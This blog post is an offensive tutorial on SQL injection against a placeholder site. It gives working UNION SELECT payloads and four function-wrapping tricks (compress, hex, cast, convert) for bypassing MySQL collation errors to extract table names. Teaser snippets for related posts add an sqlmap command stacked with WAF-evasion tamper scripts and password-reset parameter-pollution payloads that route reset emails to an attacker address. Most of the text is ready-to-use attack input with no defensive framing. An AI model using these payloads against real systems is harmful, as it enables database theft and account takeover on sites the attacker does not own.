SQL Injection - How to bypass illegal Mix of Collations

In this Tutorial You Will Learn How to Bypass illegal Mix of Collations.

Lets start with our Regular SQL injection.


Our Target.

http://www.Site.com/detail.php?id=31

First we have to Count How Many Columns it have.

http://www.Site.com/detail.php?id=31 order by 1-- - 
No Error !
http://www.Site.com/detail.php?id=31 order by 4-- - 

No Error  !
http://www.Site.com/detail.php?id=31 order by 6-- -

We Got Error Here.

Unknown Column '6' in 'order by'


Lets Reduce the Column Count.
http://www.Site.com/detail.php?id=31 order by 5-- -
No Error !

There are 5 Columns so let's Prepare our UNION SELECT Command and Find Vulnerable Columns.

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -

We Got 2 and 3.

Lets try to Get The Tables.

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -

Ooops !! we got Error Here .
Bypassing illegal Mix of Collations

Illegal mix of collations for operation 'UNION'

Here Some Methods which we can use to Bypass illegal mix of collations for operation 'UNION'



1. Using UNCOMPRESS(COMPRESS(our_query_here))

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

2. Using UNHEX(HEX(our_query_here))

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

3. Using CAST()

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,cast(table_name as binary),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

4. Using CONVERT()

 http://www.Site.com/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

SOME ADVANCE Methods for CONVERT()
In CONVERT() Function if ascii doesn't work then we can use these Functions instead of ascii.
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1

Comments

Post a Comment

Popular posts from this blog

SQLMAP Tamper Scripts WAF bypass

Use and load all tamper scripts to evade filters and WAF: sqlmap -u ‘ http://www.site.com/search.cmd?form_state=1 ’ — level=5 — risk=3 -p ‘item1’ — tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords General Tamper testing: tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus...
Read more

Account Takeover: Password Reset With Manipulating Email Parameter

 Exploitation Add attacker email as second parameter using & 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com & email = attacker@email . com Copied! Add attacker email as second parameter using %20 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com % 20 email = attacker@email . com Copied! Add attacker email as second parameter using | 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com | email = attacker@email . com Copied! Add attacker email as second parameter using cc 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld%0a%0dcc:attacker@mail.tld" Copied! Add attacker email as second parameter using bcc 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld%0a%0dbcc:attacker@mail.tld" Copied! Add attacker email as second parameter using , 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld" , email = "attacker@mail.tld" Copied! Add attacker email as second parameter in json ar...
Read more

Different types of cross-site scripting attacks

Image
Stored (persistent) XSS Stored or persistent XSS attacks occur when the malicious scripts are permanently stored on the targeted server(s); this can occur in a database, on a message board, in comment fields, or on other user input pages. Victims receive a malicious script when the information is requested from the server. Reflected XSS A reflected attack occurs when the malicious script is not contained on the server but is included in the input sent to the server. Errors messages and search results are two commonly used vectors. These attacks are often delivered to the target via an email or on another site, often by tricking the target into choosing a link containing the malicious script or through user submitting the malicious form. The malicious code then reflects to the user's browser. This reflection causes the browser to believe that the script is trustworthy and prompts the browser to execute the script. DOM based attacks There is a third type of attack, known...
Read more